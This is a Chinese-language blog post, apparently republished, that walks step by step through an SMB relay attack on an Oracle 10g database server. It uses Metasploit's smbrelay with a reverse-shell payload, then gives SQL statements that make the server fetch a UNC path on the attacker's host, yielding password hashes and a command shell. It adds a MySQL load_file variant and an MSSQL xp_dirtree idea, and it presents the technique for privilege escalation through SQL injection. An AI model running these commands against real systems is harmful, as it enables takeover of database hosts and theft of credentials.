这几天看了篇叫"Penetration: from application down to OS (Oracle)"的文档,感觉挺有意思的,文档的 大概意思就是说,如果 ORACLE 服务是用 administrator 账户启动的,你只要有一个具有 resource 和 connect 权限的数据库账户，就能利用 metasploit 的 smbrelay 功能，本地搭建一个 SMB 欺骗服务器， 来得到系统的访问权限。我本地测试了下，还真的成功了。:-) 具体的原理分析看原文吧,我这里把我的测试过程写出来. 我的渗透环境用的是 ubuntu8.10+metasploit 3.3 dev,oracle 数据库版本为 10.2.0.1.0，服务启动权限为 administrator,数据库账户用的是 dbsnmp 账户的默认权限.[img]http://files.jb51.net/upload/20090613195906138.png[/img] 1.先用 netstat 命令查看一下，本地的 139 端口有没有占用，一般占用此端口的服务就是 Samba 了，要关掉。ubuntu 的关闭方法是 sudo /etc/init.d/samba stop<p>[img]http://files.jb51.net/upload/20090613195906710.png[/img] 2.运行 metasploit，我选用的 PAYLOAD 是 shell_reverse_tcp,做好相应配置后,exploit.就能用 netstat 看到本地已经监听了 139 和 8522 端口了. [img]http://files.jb51.net/upload/20090613195907746.png[/img] [img]http://files.jb51.net/upload/20090613195907848.png[/img] 3.我现在使用 dbsnmp 默认账户连接到 oracle 数据库上，这个账户默认权限是比较低的，只有 connect和 resource 权限。 [img]http://files.jb51.net/upload/20090613195907596.png[/img] 4.然后执行下面 3 条 SQL 语句  SQL> CREATE TABLE files(id NUMBER PRIMARY KEY,path VARCHAR(255) UNIQUE,ot_format VARCHAR(6)); SQL> INSERT INTO files VALUES(1,'\\192.168.1.52\mickey',NULL); SQL> CREATE INDEX file_index ON files(path) INDEXTYPE IS ctxsys.context 2 PARAMETERS('datastore ctxsys.file_datastore format column ot_format'); [b][img]http://files.jb51.net/upload/20090613195907182.png[/img] [/b] [b][/b] [url=http://54mickey.googlepages.com/Penetration_fromapplication_down_to_.pdf][/url] [img]http://files.jb51.net/upload/20090613195907311.png[/img] [img]http://files.jb51.net/upload/20090613195907348.png[/img] 后来经过 pt007 的提醒，我又测试了 mysql,如果服务也是 administrator 启动的，用select load_file('\\\\192.168.1.52\mk.txt')也是可以得到系统权限的.MSSQL 应该用 xp_dirtree 存储过程 也是可以的，不过我没有配置出来用 administrator 账户启动 MSSQL 服务，希望知道的朋友指点下我。 这个技术可以用到内网 WEB 评估的时候，如果有注入，服务又是 administrator 启动的，可以提权了。 两个PDF下载, 作者:Mickey [url=http://dsecrg.com/files/pub/pdf/Penetration_from_application_down_to_OS_%28Oracle%20database%29.pdf]http://dsecrg.com/files/pub/pdf/Penetration_from_application_down_to_OS_(Oracle%20database).pdf[/url] [url=http://54mickey.googlepages.com/Penetration_fromapplication_down_to_.pdf]http://54mickey.googlepages.com/Penetration_fromapplication_down_to_.pdf[/url] 当执行完 create index 这句的时候，在看咱们本地的 metasploit，就已经得到 ORACLE 数据库主机的系 统当前服务用户的 half lm 哈希和 cmdshell 了。